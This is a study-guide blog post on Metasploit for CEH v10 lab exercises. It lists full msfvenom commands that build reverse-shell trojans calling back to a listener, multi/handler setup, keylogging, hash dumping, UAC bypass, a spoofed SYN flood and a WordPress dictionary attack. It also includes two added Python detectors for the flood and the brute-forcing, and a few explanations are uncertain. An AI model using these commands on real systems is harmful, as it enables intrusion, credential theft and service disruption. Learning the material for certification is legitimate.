Metasploit Framework in CEH Exam

This post explains what the Metasploit Framework is and how it is used in the Certified Ethical Hacker (CEH) exam. It is not intended to be an overall review of the tool.

It is focused on CEH v10.

What is Metasploit Framework?

Metasploit Framework (usually abbreviated as msf) is an open-source tool for developing and executing exploit code against a remote target machine.

The creator of Metasploit is HD Moore. You can find more info about him at his personal site or his Mastodon or Twitter accounts.

Jack Rhysider’s Darknet Diaries podcast interviewed HD Moore in an episode that covers the history of early Metasploit. You can listen to (or read) episode 114 “HD” on Darknet Diaries’ website, Spotify or Apple Podcasts.

Metasploit applications

Metasploit Framework consists of a series of applications. The ones used on CEH are:

  1. msfdb: manages the Metasploit Framework database.
  2. msfvenom: tool to create trojans.
  3. msfconsole: tool to execute exploits; running it from a Linux terminal opens the Metasploit Framework console.

msfdb

msfdb init

Initializes the Metasploit database. The database service must already be running before you run this (for example, service postgresql start).

You may need to restart the database after this (e.g. service postgresql restart).

msfvenom

msfvenom -l

Lists all the available exploits in the database.

Parameters

-p: payload. Value example: windows/meterpreter/reverse_tcp
--platform: platform. Value example: Windows
-a: architecture. Value example: x86
-e: encoder. Value example: x86/shikata_ga_nai
-b: bad characters, i.e. bytes the generated payload must not contain. Value example: "\x00" (including quotes)
LHOST=: value for local host. Example: LHOST=10.10.10.10
LPORT=: value for local port. Example: LPORT=444
-f: output format. Example: exe or elf
>: path for output (shell redirection). Example: Desktop/Backdoor.exe
-o: also path for output

Payloads

windows/meterpreter/reverse_tcp

Used to connect to remote Windows machines.

php/meterpreter/reverse_tcp

Generates PHP code. It must be copied to a text file saved with a .php extension, and then run on a web server.

android/meterpreter/reverse_tcp

Generates an apk file for Android.

linux/x86/shell/reverse_tcp

Generates an executable file for Linux.

Examples

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw [generates a file]

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.10.11 LPORT=4444 --platform linux -f elf > /root/Desktop/exploit.elf

msfconsole

msfconsole commands

hosts

Displays hosts on subnetwork.

services

Displays services on active hosts.

db_status

Checks the database status. If the database is not connected, you may need to initialize it.

If the message reports success (e.g., postgresql connected to msf), everything is correct.

If it is not, you may need to run msfdb again.

db_import <filename>

Imports a file from local disk into the msf database.

nmap

Calls nmap command.

db_nmap

I do not know the difference between nmap and db_nmap. If you know the difference, please add a comment.

use <module name with path>

Selects an msf module. Value example: scanner/smb/smb_version

show auxiliary

Lists the available auxiliary tools.

show exploits

Lists the available exploits.

show payloads

Lists the available payloads.

background

Sends the current session (e.g. one opened by multi/handler) to the background and returns to the msf shell.

Auxiliary modules

auxiliary/scanner/smb/smb_version

SMB scanner module used to get the OS flavour of the targets.

Seen on CEHv10, mod. 2, ex. 5.

show options

set RHOSTS 10.10.10.8-16

set THREADS 100

run

auxiliary/scanner/snmp/snmp_login

Seen on CEHv10, mod. 4, ex. 9.

set RHOSTS 10.10.10.12

exploit

auxiliary/scanner/snmp/snmp_enum

Seen on CEHv10, mod. 4, ex. 9.

set RHOSTS 10.10.10.12

exploit

Exploit modules

exploit/multi/handler

Seen on CEHv10, mod. 5, ex. 4 "Exploiting Client Side Vulnerabilities and Establishing a VNC"

set payload windows/meterpreter/reverse_tcp

Sets the payload.

set LHOST 10.10.10.11

Sets the local host.

set LPORT <port number>

Sets the local port. For example, 4444.

exploit -j -z

Runs the exploit. -j means that it is run in the background with one or more sessions. -z is the same, but with just one session. I do not know what it means when both are used.

Then we must wait until a connection appears, i.e. until a compromised computer executes the corresponding payload executable created with msfvenom.

sessions -i 1

Selects session 1.

ps

Lists processes.

getuid
Gets the username on the remote machine.

whoami

Displays current user.

sysinfo

Get system info.

getsystem -t 1

Escalates privileges. If it does not work, you can try exploit/windows/local/bypassuac_fodhelper.

pwd

Displays current path.

ifconfig

Check IP.
timestomp secret.txt -v

Displays the created time, accessed time, modified time, and entry modified time.

download <filename>

Downloads a file from the remote folder to the local home folder. Example: download bootmgr

search -f "filename.ext"

Searches for a file.

keyscan_start

Captures all keyboard input from the victim system.

keyscan_dump

Views the captured keyboard input.

idletime

Displays the idle time in seconds.

shutdown

Shuts down the computer.

execute -f cmd.exe -c -H, and then shell

Executes a Windows shell on the remote computer.

exploit/windows/local/bypassuac_fodhelper

It is used once a connection has been established with exploit/multi/handler. It allows the getsystem command to succeed.

Seen on CEHv10, mod. 5, ex. 5 “Escalating Privileges by Exploiting Client Side Vulnerabilities”

It is used to escalate privileges.

show options

Displays all options related to the module.

set SESSION <session number>

Selects the session opened with exploit/multi/handler. Example: set SESSION 1

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 10.10.10.11

set TARGET 0

Sets the exploit target id.

exploit

Runs the exploit. If it is successful, privileges can be escalated by running getsystem.

run post/windows/gather/smart_hashdump

Dumps Windows hashes.

auxiliary/dos/tcp/synflood

Performs a SYN flood on the target. Seen in module 10, lab/exercise 1.

set RHOST [IP Address of Windows 10]

Sets the target IP address.

set RPORT 21

Sets the target port.

set SHOST [IP Address of Windows Server 2016]

Sets the spoofed source IP address.

set TIMEOUT 20000

Number of seconds to wait for new data.
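As an added defender-side example, not part of the original post: a small Python detector for the half-open-connection pattern that a SYN flood like the one configured above leaves in traffic. It keys on the destination address and port (RHOST/RPORT) rather than on the source, because SHOST is spoofable. The packet records, addresses and thresholds are constructed for illustration.

```python
from collections import Counter, defaultdict

# Constructed packet records (ts seconds, src, dst, dport, tcp flags), not real traffic.
# The flood targets 10.10.10.10:21 (RHOST/RPORT in the post) from the spoofed source
# 10.10.10.16 (SHOST), which never completes the handshake; 10.10.10.20 is a legitimate
# client whose SYNs are followed by an ACK.
SAMPLE_PACKETS = (
    [(0.0, "10.10.10.20", "10.10.10.10", 21, "S"),
     (0.1, "10.10.10.20", "10.10.10.10", 21, "A")]
    + [(0.2 + i * 0.01, "10.10.10.16", "10.10.10.10", 21, "S") for i in range(40)]
    + [(1.5, "10.10.10.20", "10.10.10.10", 80, "S"),
       (1.6, "10.10.10.20", "10.10.10.10", 80, "A")]
)

def detect_syn_flood(packets, window=1.0, min_syns=20, max_completion_ratio=0.2):
    """Return {(dst, dport): info} for targets that, within any window of `window`
    seconds, receive at least min_syns SYNs of which at most max_completion_ratio
    come from sources that ever complete the handshake with an ACK. Keyed on the
    target rather than the source because the flood's SHOST can be spoofed."""
    syns = defaultdict(list)      # (dst, dport) -> [(ts, src), ...]
    completed = defaultdict(set)  # (dst, dport) -> {src that sent an ACK}
    for ts, src, dst, dport, flags in packets:
        key = (dst, dport)
        if flags == "S":
            syns[key].append((ts, src))
        elif flags == "A":
            completed[key].add(src)
    alerts = {}
    for key, entries in syns.items():
        buckets = defaultdict(list)  # window index -> [src, ...]
        for ts, src in entries:
            buckets[int(ts // window)].append(src)
        for srcs in buckets.values():
            done = sum(1 for s in srcs if s in completed[key])
            if len(srcs) >= min_syns and done / len(srcs) <= max_completion_ratio:
                alerts[key] = {"syns": len(srcs), "completed": done,
                               "top_src": Counter(srcs).most_common(1)[0][0]}
                break  # one alert per target is enough
    return alerts
```

Because the top source is the spoofed SHOST, blocking it would hit the wrong host; the useful response is SYN cookies or rate limiting on the target port.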

auxiliary/scanner/http/wordpress_login_enum

This module is used to perform a dictionary attack against a WordPress site.

Featured in module 14, exercise 2.

show options

Displays options.

set PASS_FILE /root/Desktop/Wordlists/Passwords.txt

Sets the file containing the passwords for the dictionary attack.

set RHOSTS [IP Address of Windows Server 2012]

Sets the target IP address, e.g., the Windows Server 2012 IP address.

set RPORT 8080

Sets the target machine port, e.g., the Windows Server 2012 port.

set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/

Sets the base path to the WordPress website, e.g., http://[IP Address of Windows Server 2012]:8080/CEH/.

set USERNAME admin

Sets the username to try to crack.

run

Runs the module. Search through the results for the lines marked in green.
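As an added defender-side example, not part of the original post: Python detection logic that flags the dictionary attack above in web-server access logs by counting failed POSTs to wp-login.php under the TARGETURI base path per source address. The log lines are constructed; it assumes Apache combined log format and that WordPress answers a failed login with 200 (re-rendered form) and a successful one with a 302 redirect.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format access log (not real data). 10.10.10.11 is the
# attacker box from the post; the WordPress site lives under /CEH/ on port 8080.
SAMPLE_LOG = """\
10.10.10.11 - - [10/Oct/2023:13:55:36 +0000] "POST /CEH/wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
10.10.10.11 - - [10/Oct/2023:13:55:36 +0000] "POST /CEH/wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
10.10.10.11 - - [10/Oct/2023:13:55:37 +0000] "POST /CEH/wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
10.10.10.11 - - [10/Oct/2023:13:55:37 +0000] "POST /CEH/wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
10.10.10.11 - - [10/Oct/2023:13:55:38 +0000] "POST /CEH/wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
10.10.10.11 - - [10/Oct/2023:13:55:38 +0000] "POST /CEH/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.10.20 - - [10/Oct/2023:13:56:30 +0000] "POST /CEH/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])

def detect_login_bruteforce(log_text, base_path="/CEH/", window_seconds=60, threshold=5):
    """Flag source IPs with at least `threshold` failed logins (HTTP 200 on the POST)
    to wp-login.php under base_path within window_seconds. Also report whether a
    successful login (302) followed the failures, i.e. the dictionary attack worked."""
    login_path = base_path.rstrip("/") + "/wp-login.php"
    posts = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == login_path:
            posts[rec[0]].append((rec[1], rec[4]))
    alerts = {}
    for ip, entries in posts.items():
        entries.sort()
        failures = [t for t, s in entries if s == 200]
        window = timedelta(seconds=window_seconds)
        for i, start in enumerate(failures):  # sliding window over failure times
            if len([t for t in failures[i:] if t - start <= window]) >= threshold:
                success = any(s == 302 and t >= start for t, s in entries)
                alerts[ip] = {"failed_attempts": len(failures),
                              "success_after_failures": success}
                break
    return alerts
```

A single client that logs in once (10.10.10.20) is not flagged; the attacker address is, together with the fact that the guessing ended in a successful login, which should trigger a password reset for that account.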

CEHv10 exercises where Metasploit Framework is featured

  • Mod. 2 “Information Gathering”
    • Ex. 5 “Information gathering using Metasploit”
  • Mod. 4 “Enumeration”
    • Ex. 9 “SNMP Enumeration Using snmp_enum”
  • Mod. 6 “System Hacking”
    • Ex. 4 “Exploiting Client Side Vulnerabilities and Establishing a VNC”
    • Ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”
    • Ex. 6. “Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter”
  • Mod. 12
    • Ex. 5 “Bypassing Windows Firewall using Metasploit”
  • Mod. 14
    • Ex. 2 “Enumerating and Hacking a Web Application Using WPScan and Metasploit”
    • Ex. 6 “Exploiting File Upload Vulnerability at Different Security Levels”
  • Mod. 17 “Hacking Mobile Platforms”
    • Ex. 1 “Creating Binary Payloads using Kali Linux to Hack Android”
  • Mod. 19
    • Ex. 3 “Bypassing ownCloud Antivirus and Hacking the Host using Kali Linux”
